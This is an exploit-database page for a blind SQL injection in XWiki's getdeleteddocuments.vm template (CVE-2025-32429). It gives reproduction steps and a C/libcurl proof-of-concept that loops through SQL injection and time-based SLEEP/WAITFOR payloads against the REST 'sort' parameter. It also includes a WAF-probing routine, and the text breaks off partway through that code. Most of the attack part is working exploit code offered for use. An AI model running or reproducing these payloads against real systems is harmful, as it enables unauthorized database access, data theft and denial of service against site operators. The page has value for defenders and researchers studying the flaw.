{"id":9195,"date":"2025-07-29T03:38:26","date_gmt":"2025-07-29T03:38:26","guid":{"rendered":"http:\/\/localhost\/?p=9195"},"modified":"2025-07-29T03:38:26","modified_gmt":"2025-07-29T03:38:26","slug":"xwiki-14-sql-injection-via-getdeleteddocumentsvm","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=9195","title":{"rendered":"XWiki 14 &#8211; SQL Injection via getdeleteddocuments.vm"},"content":{"rendered":"<h2>Exploit Details<\/h2>\n<h3>Basic Information<\/h3>\n<table style=\"width:100%; border-collapse: collapse; margin-bottom: 20px;\">\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Exploit Title<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">XWiki 14 &#8211; SQL Injection via getdeleteddocuments.vm<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Exploit ID<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">EDB-ID:52384<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Type<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">exploitdb<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Published<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">2025-07-28T00:00:00<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Modified<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">2025-07-28T00:00:00<\/td>\n<\/tr>\n<\/table>\n<h3>CVSS Information<\/h3>\n<table style=\"width:100%; border-collapse: collapse; margin-bottom: 20px;\">\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">CVSS Score<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">9.3<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Severity<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd; color: #cc0000; font-weight: bold;\">CRITICAL<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Vector<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:N\/UI:N\/VC:H\/SC:N\/VI:H\/SI:N\/VA:H\/SA:N<\/td>\n<\/tr>\n<\/table>\n<h3>CVE Information<\/h3>\n<div style=\" padding: 15px; border: 1px solid #ddd; margin-bottom: 20px;\">\n<ul style=\"margin: 0; padding-left: 20px;\">\n<li>CVE-2025-32429<\/li>\n<\/ul>\n<\/div>\n<h3>Exploit Description<\/h3>\n<div style=\" padding: 15px; border-left: 4px solid #4CAF50; margin-bottom: 20px;\">\nExploit Title: XWiki 14 &#8211; SQL Injection via getdeleteddocuments.vm Google&#8230;\n<\/div>\n<h3>Exploit Code<\/h3>\n<div style=\" color: #d4d4d4; padding: 15px; border: 1px solid #ddd; margin-bottom: 20px; font-family: 'Courier New', monospace; white-space: pre-wrap; overflow-x: auto;\">\n# Exploit Title: XWiki 14 &#8211; SQL Injection via getdeleteddocuments.vm<br \/>\n<br \/># Google Dork: N\/A<br \/>\n<br \/># Date: 28 July 2025<br \/>\n<br \/># Exploit Author: Byte Reaper<br \/>\n<br \/># LinkedIn: N\/A<br \/>\n<br \/># Vendor Homepage: https:\/\/www.xwiki.org<br \/>\n<br \/># Software Link: https:\/\/www.xwiki.org<br \/>\n<br \/># Version: XWiki Platform \u2264 14.x<br \/>\n<br \/># Tested on: XWiki Platform \u2264 14.x<br \/>\n<br \/># CVE: CVE-2025-32429<\/p>\n<p>## Vulnerability Description<\/p>\n<p>A blind SQL Injection vulnerability exists in the XWiki Platform\u2019s `getdeleteddocuments.vm` template, specifically via the `sort` parameter. The vulnerability can be exploited by sending a crafted payload to the following REST endpoint:<\/p>\n<p>&#8220;`<br \/>\n<br \/>\/xwiki\/rest\/liveData\/sources\/liveTable\/entries?sourceParams.template=getdeleteddocuments.vm&#038;sort=<PAYLOAD><br \/>\n<br \/>&#8220;`<\/p>\n<p>An attacker can inject arbitrary SQL statements into the underlying database query, resulting in data exfiltration, authentication bypass, or denial of service. The vulnerability was verified on XWiki Platform versions up to 14.x using a C-based curl exploit.<\/p>\n<p>## Steps to Reproduce<\/p>\n<p>1. Save the provided `exploit.c` file to your local environment.<br \/>\n<br \/>2. Compile the PoC:<br \/>\n<br \/>   &#8220;`<br \/>\n<br \/>   gcc -o exploit exploit.c argparse.c -lcurl<br \/>\n<br \/>   &#8220;`<br \/>\n<br \/>3. Execute against a vulnerable instance:<br \/>\n<br \/>   &#8220;`<br \/>\n<br \/>   .\/exploit -u http:\/\/victim.example.com\/xwiki<br \/>\n<br \/>   &#8220;`<br \/>\n<br \/>4. Observe response delays or injected content indicating successful SQL execution.<\/p>\n<p>## Proof of Concept<\/p>\n<p>&#8211; GitHub PoC: https:\/\/github.com\/byteReaper77\/CVE-2025-32429\/blob\/main\/exploit.c<\/p>\n<p>\/*<br \/>\n<br \/> * Author       : Byte Reaper<br \/>\n<br \/> * Telegram     : @ByteReaper0<br \/>\n<br \/> * CVE          : CVE-2025-32429<br \/>\n<br \/> * Vulnerability: SQL Injection<br \/>\n<br \/> * Description : A vulnerability in the xwiki platform using the sort operator in the getdeletedocuments.v file, which leads to injecting malicious SQL statements into the sort= parameter.<br \/>\n<br \/> * &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br \/>\n<br \/> *\/<\/p>\n<p>#include <stdio.h><br \/>\n<br \/>#include <string.h><br \/>\n<br \/>#include <curl\/curl.h><br \/>\n<br \/>#include &#8220;argparse.h&#8221;<br \/>\n<br \/>#include <time.h><br \/>\n<br \/>#include <stdlib.h><br \/>\n<br \/>#include <unistd.h><br \/>\n<br \/>#define URL 2500<br \/>\n<br \/>const char *yourUrl = NULL;<br \/>\n<br \/>int verbose = 0;<br \/>\n<br \/>int selecetCookie = 0;<br \/>\n<br \/>const char *cookies = NULL;<\/p>\n<p>void exitAssembly()<br \/>\n<br \/>{<br \/>\n<br \/>    __asm__ volatile<br \/>\n<br \/>    (<br \/>\n<br \/>        &#8220;xor %%rdi, %%rdi\\n\\t&#8221;<br \/>\n<br \/>        &#8220;mov $231, %%rax\\n\\t&#8221;<br \/>\n<br \/>        &#8220;syscall\\n\\t&#8221;<br \/>\n<br \/>        :<br \/>\n<br \/>        :<br \/>\n<br \/>        : &#8220;rax&#8221;,<br \/>\n<br \/>          &#8220;rdi&#8221;<br \/>\n<br \/>    );<br \/>\n<br \/>}<br \/>\n<br \/>struct Mem<br \/>\n<br \/>{<br \/>\n<br \/>    char *buffer;<br \/>\n<br \/>    size_t len;<br \/>\n<br \/>};<br \/>\n<br \/>size_t write_cb(void *ptr, size_t size, size_t nmemb, void *userdata)<br \/>\n<br \/>{<br \/>\n<br \/>    size_t total = size * nmemb;<br \/>\n<br \/>    struct Mem *m = (struct Mem *)userdata;<br \/>\n<br \/>    char *tmp = realloc(m->buffer, m->len + total + 1);<br \/>\n<br \/>    if (tmp == NULL)<br \/>\n<br \/>    {<br \/>\n<br \/>        printf(&#8220;\\e[1;31m[-] Failed to allocate memory!\\e[0m\\n&#8221;);<br \/>\n<br \/>        exitAssembly();<br \/>\n<br \/>    }<br \/>\n<br \/>    m->buffer = tmp;<br \/>\n<br \/>    memcpy(&#038;(m->buffer[m->len]), ptr, total);<br \/>\n<br \/>    m->len += total;<br \/>\n<br \/>    m->buffer[m->len] = &#8216;\\0&#8217;;<br \/>\n<br \/>    return total;<br \/>\n<br \/>}<br \/>\n<br \/>const char *payload[] =<br \/>\n<br \/>{<br \/>\n<br \/>    &#8220;&#8216; OR &#8216;1&#8221;,<br \/>\n<br \/>    &#8221; &#8216; OR 1 &#8212; -&#8220;,<br \/>\n<br \/>    &#8221; OR &#8220;&#8221; = &#8220;,<br \/>\n<br \/>    &#8220;\\&#8221; OR 1 = 1 &#8212; -&#8220;,<br \/>\n<br \/>    &#8220;,(select * from (select(sleep(5)))a)&#8221;,<br \/>\n<br \/>    &#8220;%2c(select%20*%20from%20(select(sleep(5)))a)&#8221;,<br \/>\n<br \/>    &#8220;&#8216;;WAITFOR DELAY &#8216;0:0:05&#8217;&#8211;&#8220;,<br \/>\n<br \/>    &#8220;AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND &#8216;%&#8217;='&#8221;,<br \/>\n<br \/>    &#8220;AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)&#8221;,<br \/>\n<br \/>    &#8220;AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)&#8211;&#8220;,<br \/>\n<br \/>    &#8220;AS INJECTX WHERE 1=1 AND 1=0&#8211;&#8220;,<br \/>\n<br \/>    &#8220;WHERE 1=1 AND 1=1&#8221;<br \/>\n<br \/>};<br \/>\n<br \/>const char *word[] =<br \/>\n<br \/>{<br \/>\n<br \/>    &#8220;select&#8221;,<br \/>\n<br \/>    &#8220;union&#8221;,<br \/>\n<br \/>    &#8220;insert&#8221;,<br \/>\n<br \/>    &#8220;update&#8221;,<br \/>\n<br \/>    &#8220;delete&#8221;,<br \/>\n<br \/>    &#8220;drop&#8221;,<br \/>\n<br \/>    &#8220;create&#8221;,<br \/>\n<br \/>    &#8220;alter&#8221;,<br \/>\n<br \/>    &#8220;truncate&#8221;,<br \/>\n<br \/>    &#8220;replace&#8221;,<br \/>\n<br \/>    &#8220;or&#8221;,<br \/>\n<br \/>    &#8220;and&#8221;,<br \/>\n<br \/>    &#8220;not&#8221;,<br \/>\n<br \/>    &#8220;1=1&#8221;,<br \/>\n<br \/>    &#8220;1=0&#8221;,<br \/>\n<br \/>    &#8220;&#8211;&#8220;,<br \/>\n<br \/>    &#8220;#&#8221;,<br \/>\n<br \/>    &#8220;\/*&#8221;,<br \/>\n<br \/>    &#8220;*\/&#8221;,<br \/>\n<br \/>    &#8220;sleep&#8221;,<br \/>\n<br \/>    &#8220;benchmark&#8221;,<br \/>\n<br \/>    &#8220;load_file&#8221;,<br \/>\n<br \/>    &#8220;outfile&#8221;,<br \/>\n<br \/>    &#8220;error&#8221;,<br \/>\n<br \/>    &#8220;warning&#8221;,<br \/>\n<br \/>    &#8220;mysql&#8221;,<br \/>\n<br \/>    &#8220;pg_&#8221;,<br \/>\n<br \/>    &#8220;exec&#8221;,<br \/>\n<br \/>    &#8220;xp_&#8221;,<br \/>\n<br \/>    &#8220;admin&#8221;,<br \/>\n<br \/>    &#8220;root&#8221;,<br \/>\n<br \/>    &#8220;&#8221;<br \/>\n<br \/>};<\/p>\n<p>int numberPayload = sizeof(payload) \/ sizeof(payload[0]);<br \/>\n<br \/>int numberWord = sizeof(word) \/ sizeof(word[0]);<br \/>\n<br \/>char full[URL];<\/p>\n<p>void injection(const char *baseUrl)<br \/>\n<br \/>{<br \/>\n<br \/>    CURLcode res ;<br \/>\n<br \/>    CURL *curl = curl_easy_init();<br \/>\n<br \/>    struct  Mem response =<br \/>\n<br \/>    {<br \/>\n<br \/>        NULL,<br \/>\n<br \/>        0<\/p>\n<p>    };<br \/>\n<br \/>    if (curl == NULL)<br \/>\n<br \/>    {<br \/>\n<br \/>        printf(&#8220;\\e[1;31m[-] Error Create Object Curl !\\e[0m\\n&#8221;);<br \/>\n<br \/>        printf(&#8220;\\e[1;31m[-] Check Your Connection (Ping)&#8230;\\e[0m\\n&#8221;);<br \/>\n<br \/>        printf(&#8220;\\e[1;31m[-] Command : ping google.com\\n&#8221;);<br \/>\n<br \/>        const char *pingCommand = &#8220;\/bin\/ping&#8221;;<br \/>\n<br \/>        const char *argv[]      = {&#8220;ping&#8221;, &#8220;-c&#8221;, &#8220;5&#8221;, &#8220;google.com&#8221;, NULL};<br \/>\n<br \/>        const char *envp[]      = {NULL};<br \/>\n<br \/>        __asm__ volatile<br \/>\n<br \/>        (<br \/>\n<br \/>            &#8220;mov %[argv], %%rsi\\n\\t&#8221;<br \/>\n<br \/>            &#8220;mov $59, %%rax\\n\\t&#8221;<br \/>\n<br \/>            &#8220;mov %[envp], %%rdx\\n\\t&#8221;<br \/>\n<br \/>            &#8220;mov %[command], %%rdi\\n\\t&#8221;<br \/>\n<br \/>            &#8220;syscall\\n\\t&#8221;<br \/>\n<br \/>            &#8220;cmp $0, %%rax\\n\\t&#8221;<br \/>\n<br \/>            &#8220;jl exitSyscall\\n\\t&#8221;<br \/>\n<br \/>            &#8220;exitSyscall:\\n\\t&#8221;<br \/>\n<br \/>            &#8220;mov $0x3C, %%rax\\n\\t&#8221;<br \/>\n<br \/>            &#8220;xor %%rdi, %%rdi\\n\\t&#8221;<br \/>\n<br \/>            &#8220;syscall\\n\\t&#8221;<br \/>\n<br \/>            &#8220;.2:\\n\\t&#8221;<br \/>\n<br \/>            :<br \/>\n<br \/>            : [argv] &#8220;r&#8221; (argv),<br \/>\n<br \/>              [envp] &#8220;r&#8221; (envp),<br \/>\n<br \/>              [command] &#8220;r&#8221; (pingCommand)<br \/>\n<br \/>            : &#8220;rax&#8221;,<br \/>\n<br \/>              &#8220;rdi&#8221;,<br \/>\n<br \/>              &#8220;rsi&#8221;,<br \/>\n<br \/>              &#8220;rdx&#8221;<br \/>\n<br \/>        );<br \/>\n<br \/>    }<\/p>\n<p>    response.buffer = NULL;<br \/>\n<br \/>    response.len = 0;<br \/>\n<br \/>    if (verbose)<br \/>\n<br \/>    {<br \/>\n<br \/>        printf(&#8220;\\e[1;35m==========================================\\e[0m\\n&#8221;);<br \/>\n<br \/>        printf(&#8220;\\e[1;33m[+] Cleaning Response&#8230;\\e[0m\\n&#8221;);<br \/>\n<br \/>        printf(&#8220;\\e[1;33m[+] Response Buffer : %s\\e[0m\\n&#8221;,response.buffer);<br \/>\n<br \/>        printf(&#8220;\\e[1;33m[+] Response Len : %d\\e[0m\\n&#8221;,response.len);<br \/>\n<br \/>        printf(&#8220;\\e[1;35m==========================================\\e[0m\\n&#8221;);<br \/>\n<br \/>    }<\/p>\n<p>    if (curl)<br \/>\n<br \/>    {<br \/>\n<br \/>        int n = 0;<br \/>\n<br \/>        for (int p = 0; p < numberPayload; p++)\n<br \/>        {<br \/>\n<br \/>            char *encodePayload = curl_easy_escape(curl,<br \/>\n<br \/>                                                   payload[p],<br \/>\n<br \/>                                                   0);<br \/>\n<br \/>            if (!encodePayload)<br \/>\n<br \/>            {<br \/>\n<br \/>                printf(&#8220;\\e[1;31m[-] Error Encode Payload !\\e[0m\\n&#8221;);<br \/>\n<br \/>                exitAssembly();<br \/>\n<br \/>            }<br \/>\n<br \/>            snprintf(full,<br \/>\n<br \/>                     sizeof(full),<br \/>\n<br \/>                     &#8220;%s\/xwiki\/rest\/liveData\/sources\/liveTable\/entries?sourceParams.template=getdeleteddocuments.vm&#038;sort=%s&#8221;,<br \/>\n<br \/>                     baseUrl,<br \/>\n<br \/>                     encodePayload);<\/p>\n<p>            printf(&#8220;\\e[1;34m[+] Encode Payload Successfully.\\e[0m\\n&#8221;);<br \/>\n<br \/>            printf(&#8220;\\e[1;34m[+] Payload Encode : %s\\e[0m\\n&#8221;, encodePayload);<\/p>\n<p>            curl_easy_setopt(curl,<br \/>\n<br \/>                             CURLOPT_URL,<br \/>\n<br \/>                             full);<br \/>\n<br \/>            struct timespec ts;<br \/>\n<br \/>            ts.tv_sec = 0;<br \/>\n<br \/>            ts.tv_nsec = 10000000;<br \/>\n<br \/>            printf(&#8220;\\e[1;34m[+] sys_nanosleep syscall (10000000)&#8230;\\e[0m\\n&#8221;);<br \/>\n<br \/>            __asm__  volatile<br \/>\n<br \/>            (<br \/>\n<br \/>                &#8220;mov $35, %%rax\\n\\t&#8221;<br \/>\n<br \/>                &#8220;mov %[ts], %%rdi\\n\\t&#8221;<br \/>\n<br \/>                &#8220;xor %%rsi, %%rsi\\n\\t&#8221;<br \/>\n<br \/>                &#8220;syscall\\n\\t&#8221;<br \/>\n<br \/>                :<br \/>\n<br \/>                : [ts] &#8220;r&#8221; (&#038;ts)<br \/>\n<br \/>                :&#8221;rax&#8221;, &#8220;rdi&#8221;, &#8220;rsi&#8221;<\/p>\n<p>            );<br \/>\n<br \/>            if (selecetCookie)<br \/>\n<br \/>            {<br \/>\n<br \/>                curl_easy_setopt(curl,<br \/>\n<br \/>                                 CURLOPT_COOKIEFILE,<br \/>\n<br \/>                                 cookies);<br \/>\n<br \/>                curl_easy_setopt(curl,<br \/>\n<br \/>                                 CURLOPT_COOKIEJAR,<br \/>\n<br \/>                                 cookies);<\/p>\n<p>            }<br \/>\n<br \/>            curl_easy_setopt(curl,<br \/>\n<br \/>                             CURLOPT_FOLLOWLOCATION,<br \/>\n<br \/>                             1L);<br \/>\n<br \/>            curl_easy_setopt(curl,<br \/>\n<br \/>                             CURLOPT_WRITEFUNCTION,<br \/>\n<br \/>                             write_cb);<br \/>\n<br \/>            if (verbose)<br \/>\n<br \/>            {<br \/>\n<br \/>                printf(&#8220;\\e[1;35m&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;[Verbose Curl]&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;\\e[0m\\n&#8221;);<br \/>\n<br \/>                curl_easy_setopt(curl,<br \/>\n<br \/>                                 CURLOPT_VERBOSE,<br \/>\n<br \/>                                 1L);<br \/>\n<br \/>            }<br \/>\n<br \/>            curl_easy_setopt(curl,<br \/>\n<br \/>                             CURLOPT_WRITEDATA,<br \/>\n<br \/>                             &#038;response);<br \/>\n<br \/>            curl_easy_setopt(curl,<br \/>\n<br \/>                             CURLOPT_CONNECTTIMEOUT,<br \/>\n<br \/>                             5L);<br \/>\n<br \/>            curl_easy_setopt(curl,<br \/>\n<br \/>                             CURLOPT_TIMEOUT,<br \/>\n<br \/>                             10L);<br \/>\n<br \/>            curl_easy_setopt(curl,<br \/>\n<br \/>                             CURLOPT_SSL_VERIFYPEER,<br \/>\n<br \/>                             0L);<br \/>\n<br \/>            curl_easy_setopt(curl,<br \/>\n<br \/>                             CURLOPT_SSL_VERIFYHOST,<br \/>\n<br \/>                             0L);<br \/>\n<br \/>            struct curl_slist *headers = NULL;<br \/>\n<br \/>            headers = curl_slist_append(headers,<br \/>\n<br \/>                                        &#8220;Accept-Language: en-US,en&#8221;);<br \/>\n<br \/>            headers = curl_slist_append(headers,<br \/>\n<br \/>                                        &#8220;Connection: keep-alive&#8221;);<br \/>\n<br \/>            headers = curl_slist_append(headers,<br \/>\n<br \/>                                        &#8220;Referer: http:\/\/example.com&#8221;);<br \/>\n<br \/>            double delayTime;<br \/>\n<br \/>            clock_t start = clock();<br \/>\n<br \/>            res = curl_easy_perform(curl);<br \/>\n<br \/>            printf(&#8220;\\e[1;34m+] Payload : %s\\e[0m\\n&#8221;, payload[p]);<br \/>\n<br \/>            printf(&#8220;\\e[1;34m[+] Encode Payload %s\\e[0m\\n&#8221;, encodePayload);<br \/>\n<br \/>            printf(&#8220;\\e[1;32m[*] PID : %d\\e[0m\\n&#8221;, getpid());<br \/>\n<br \/>            curl_free(encodePayload);<br \/>\n<br \/>            curl_slist_free_all(headers);<br \/>\n<br \/>            usleep(1000000);<br \/>\n<br \/>            if (res == CURLE_OK)<br \/>\n<br \/>            {<\/p>\n<p>                printf(&#8220;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;\\n&#8221;);<br \/>\n<br \/>                long httpCode  = 0;<br \/>\n<br \/>                curl_easy_getinfo(curl,<br \/>\n<br \/>                                  CURLINFO_RESPONSE_CODE,<br \/>\n<br \/>                                  &#038;httpCode);<br \/>\n<br \/>                curl_easy_getinfo(curl,<br \/>\n<br \/>                                  CURLINFO_TOTAL_TIME,<br \/>\n<br \/>                                  &#038;delayTime);<br \/>\n<br \/>                printf(&#8220;\\e[1;36m[+] Request sent successfully\\e[0m\\n&#8221;);<br \/>\n<br \/>                printf(&#8220;\\e[1;34m[+] Delay Time Response : %f\\e[0m\\n&#8221;,<br \/>\n<br \/>                       delayTime);<br \/>\n<br \/>                printf(&#8220;\\e[1;37m[+] Input Url : %s\\e[0m\\n&#8221;,<br \/>\n<br \/>                       baseUrl);<br \/>\n<br \/>                printf(&#8220;\\e[1;37m[+] Full Url : %s\\e[0m\\n&#8221;,<br \/>\n<br \/>                       full);<br \/>\n<br \/>                printf(&#8220;\\e[1;32m[+] Http Code -> %ld\\e[0m\\n&#8221;, httpCode);<br \/>\n<br \/>                if (httpCode >= 200 &#038;&#038; httpCode < 300)\n<br \/>                {<br \/>\n<br \/>                    clock_t end = clock();<br \/>\n<br \/>                    double timeInjection  = (double) (end  &#8211; start )\/ CLOCKS_PER_SEC;<br \/>\n<br \/>                    printf(&#8220;\\e[1;36m[+] Positive Http Code (200 < 300) : %ld\\n\",httpCode);\n<br \/>                    for (int w = 0; w < numberWord; w++)\n<br \/>                    {<br \/>\n<br \/>                        if (strstr(response.buffer, word[w]) != NULL)<br \/>\n<br \/>                        {<br \/>\n<br \/>                            printf(&#8220;\\e[1;34m[+] A suspicious word was found in the server&#8217;s response !!\\e[0m\\n&#8221;);<br \/>\n<br \/>                            printf(&#8220;\\e[1;34m[+] Word Found : %s\\e[0m\\n&#8221;, word[w]);<br \/>\n<br \/>                            printf(&#8220;[+] The vulnerability CVE-2025-32429 exists on the server\\e[0m\\n&#8221;);<br \/>\n<br \/>                            printf(&#8220;\\e[1;37m\\n======================================== [Response Server] ========================================\\e[0m\\n&#8221;);<br \/>\n<br \/>                            printf(&#8220;%s\\n&#8221;, response.buffer);<br \/>\n<br \/>                            printf(&#8220;\\e[1;32m[Len] : %d\\e[0m\\n&#8221;, response.len);<br \/>\n<br \/>                            printf(&#8220;\\e[1;37m\\n==================================================================================================\\e[0m\\n&#8221;);<br \/>\n<br \/>                            printf(&#8220;[+] Check Timeout Response&#8230;\\e[0m\\n&#8221;);<br \/>\n<br \/>                            if (timeInjection >= 7.5)<br \/>\n<br \/>                            {<br \/>\n<br \/>                                printf(&#8220;\\e[1;34m[+] Possible SQL Executed (Delay Detected)\\e[0m\\n&#8221;);<br \/>\n<br \/>                                printf(&#8220;\\e[1;34m[+] The server is experiencing a vulnerability (CVE-2025-32429)\\e[0m\\n&#8221;);<br \/>\n<br \/>                            }<br \/>\n<br \/>                            else<br \/>\n<br \/>                            {<br \/>\n<br \/>                                printf(&#8220;\\e[1;31m[-] No response delay detected !\\e[0m\\n&#8221;);<br \/>\n<br \/>                            }<br \/>\n<br \/>                        }<br \/>\n<br \/>                        else<br \/>\n<br \/>                        {<br \/>\n<br \/>                            printf(&#8220;\\e[1;31m[-] No suspicious words were found in the server response !\\e[0m\\n&#8221;);<\/p>\n<p>                        }<br \/>\n<br \/>                    }<br \/>\n<br \/>                }<br \/>\n<br \/>                else<br \/>\n<br \/>                {<br \/>\n<br \/>                    printf(&#8220;\\e[1;31m[-] HTTP Code Not Range Positive (200 < 300) : %ld\\e[0m\\n\", httpCode);\n<br \/>                    printf(&#8220;\\e[1;34m[+] Try Next Payload : %s\\e[0m\\n&#8221;, payload[p]);<br \/>\n<br \/>                }<\/p>\n<p>            }<br \/>\n<br \/>            else<br \/>\n<br \/>            {<br \/>\n<br \/>                printf(&#8220;\\e[1;31m[-] Error Send Request\\e[0m\\n&#8221;);<br \/>\n<br \/>                printf(&#8220;\\e[1;31m[-] Error : %s\\e[0m\\n&#8221;, curl_easy_strerror(res));<br \/>\n<br \/>                printf(&#8220;\\e[1;31m[-] Please Check Your Connection !\\e[0m\\n&#8221;);<br \/>\n<br \/>                exitAssembly();<br \/>\n<br \/>            }<\/p>\n<p>        }<\/p>\n<p>    }<br \/>\n<br \/>    if (response.buffer)<br \/>\n<br \/>    {<br \/>\n<br \/>        free(response.buffer);<br \/>\n<br \/>        response.buffer = NULL;<br \/>\n<br \/>        response.len = 0;<br \/>\n<br \/>    }<br \/>\n<br \/>    curl_easy_cleanup(curl);<br \/>\n<br \/>}<br \/>\n<br \/>void checkWaf(const char *base)<br \/>\n<br \/>{<br \/>\n<br \/>    printf(&#8220;[+] Check Waf ============================================================\\e[0m\\n&#8221;);<br \/>\n<br \/>    struct Mem response = {NULL, 0};<br \/>\n<br \/>    response.buffer = NULL;<br \/>\n<br \/>    response.len = 0;<br \/>\n<br \/>    int step1 = 0;<br \/>\n<br \/>    int step2= 0;<br \/>\n<br \/>    int step3 = 0;<br \/>\n<br \/>    int step4 = 0;<br \/>\n<br \/>    int step5 = 0;<br \/>\n<br \/>    if (verbose)<br \/>\n<br \/>    {<br \/>\n<br \/>        printf(&#8220;\\e[1;33m[+] Response Buffer Cleaning Successfully \\e[0m\\n&#8221;);<br \/>\n<br \/>        printf(&#8220;\\e[1;33m[+] Response Buffer : %s\\e[0m\\n&#8221;, response.buffer);<br \/>\n<br \/>        printf(&#8220;\\e[1;33m[+] Response Len : %zu\\e[0m\\n&#8221;, response.len);<br \/>\n<br \/>    }<br \/>\n<br \/>    const char *keyWaf[] =<br \/>\n<br \/>    {<br \/>\n<br \/>        &#8220;Access Denied&#8221;,<br \/>\n<br \/>        &#8220;Request blocked&#8221;,<br \/>\n<br \/>        &#8220;Security violation&#8221;,<br \/>\n<br \/>        &#8220;Your request looks suspicious&#8221;<br \/>\n<br \/>    };<br \/>\n<br \/>    int numberWaf = sizeof(keyWaf) \/ sizeof(keyWaf[0]);<br \/>\n<br \/>    printf(&#8220;\\e[1;34m[+] Base URL : %s\\e[0m\\n&#8221;, base);<br \/>\n<br \/>    CURLcode res;<br \/>\n<br \/>    char fullWaf[URL];<br \/>\n<br \/>    snprintf(fullWaf, sizeof(fullWaf),<br \/>\n<br \/>             &#8220;%s\/xwiki\/rest\/liveData\/sources\/liveTable\/entries?sourceParams.template=getdeleteddocuments.vm&#038;sort=&#8221;&#8221;,<br \/>\n<br \/>             base);<br \/>\n<br \/>    printf(&#8220;\\e[1;34m[+] Full Url : %s\\e[0m\\n&#8221;,fullWaf);<br \/>\n<br \/>    CURL *curl = curl_easy_init();<br \/>\n<br \/>    if (curl == NULL)<br \/>\n<br \/>    {<br \/>\n<br \/>        printf(&#8220;\\e[1;31m[-] Error: Could not initialize CURL.\\e[0m\\n&#8221;);<br \/>\n<br \/>        exitAssembly();<br \/>\n<br \/>    }<\/p>\n<p>    curl_easy_setopt(curl,<br \/>\n<br \/>                     CURLOPT_URL, fullWaf);<br \/>\n<br \/>    curl_easy_setopt(curl,<br \/>\n<br \/>                     CURLOPT_FOLLOWLOCATION,<br \/>\n<br \/>                     1L);<\/p>\n<p>    struct curl_slist *headers = NULL;<br \/>\n<br \/>    headers = curl_slist_append(headers,<br \/>\n<br \/>                                &#8220;User-Agent: sqlmap&#8221;);<br \/>\n<br \/>    curl_easy_setopt(curl,<br \/>\n<br \/>                     CURLOPT_HTTPHEADER,<br \/>\n<br \/>                     headers);<br \/>\n<br \/>    curl_easy_setopt(curl,<br \/>\n<br \/>                     CURLOPT_WRITEDATA,<br \/>\n<br \/>                     &#038;response);<br \/>\n<br \/>    curl_easy_setopt(curl,<br \/>\n<br \/>                     CURLOPT_WRITEFUNCTION,<br \/>\n<br \/>                     write_cb);<\/p>\n<p>    res = curl_easy_perform(curl);<\/p>\n<p>    double timeD = 0;<br \/>\n<br \/>    long code = 0;<br \/>\n<br \/>    long redirects = 0;<br \/>\n<br \/>    if (res == CURLE_OK)<br \/>\n<br \/>    {<br \/>\n<br \/>        curl_easy_getinfo(curl,<br \/>\n<br \/>                          CURLINFO_REDIRECT_COUNT,<br \/>\n<br \/>                          &#038;redirects);<br \/>\n<br \/>        curl_easy_getinfo(curl,<br \/>\n<br \/>                          CURLINFO_TOTAL_TIME,<br \/>\n<br \/>                          &#038;timeD);<br \/>\n<br \/>        curl_easy_getinfo(curl,<br \/>\n<br \/>                          CURLINFO_RESPONSE_CODE,<br \/>\n<br \/>                          &#038;code);<br \/>\n<br \/>        printf(&#8220;\\e[1;36m[+] Step 1: Check Number redirects\\e[0m\\n&#8221;);<br \/>\n<br \/>        if (redirects > 1)<br \/>\n<br \/>        {<br \/>\n<br \/>            printf(&#8220;\\e[1;35m============= [ WAF DETECTED ] =============\\e[0m\\n&#8221;);<br \/>\n<br \/>            printf(&#8220;\\e[1;34m[+] Suspicious number of redirects: %ld\\e[0m\\n&#8221;, redirects);<br \/>\n<br \/>            printf(&#8220;\\e[1;35m============================================\\e[0m\\n&#8221;);<br \/>\n<br \/>            step1 = 1;<br \/>\n<br \/>        }<br \/>\n<br \/>        else<br \/>\n<br \/>        {<br \/>\n<br \/>            printf(&#8220;[-] Waf not detected (Number redirects)\\e[0m\\n&#8221;);<br \/>\n<br \/>        }<br \/>\n<br \/>        printf(&#8220;\\e[1;34m[+] Request sent with simple payload (&#8221;)\\e[0m\\n&#8221;);<br \/>\n<br \/>        printf(&#8220;\\e[1;35m[+] Step 2: Check HTTP Code\\e[0m\\n&#8221;);<br \/>\n<br \/>        printf(&#8220;\\e[1;32m[+] HTTP Code: %ld\\e[0m\\n&#8221;, code);<br \/>\n<br \/>        if (code == 403 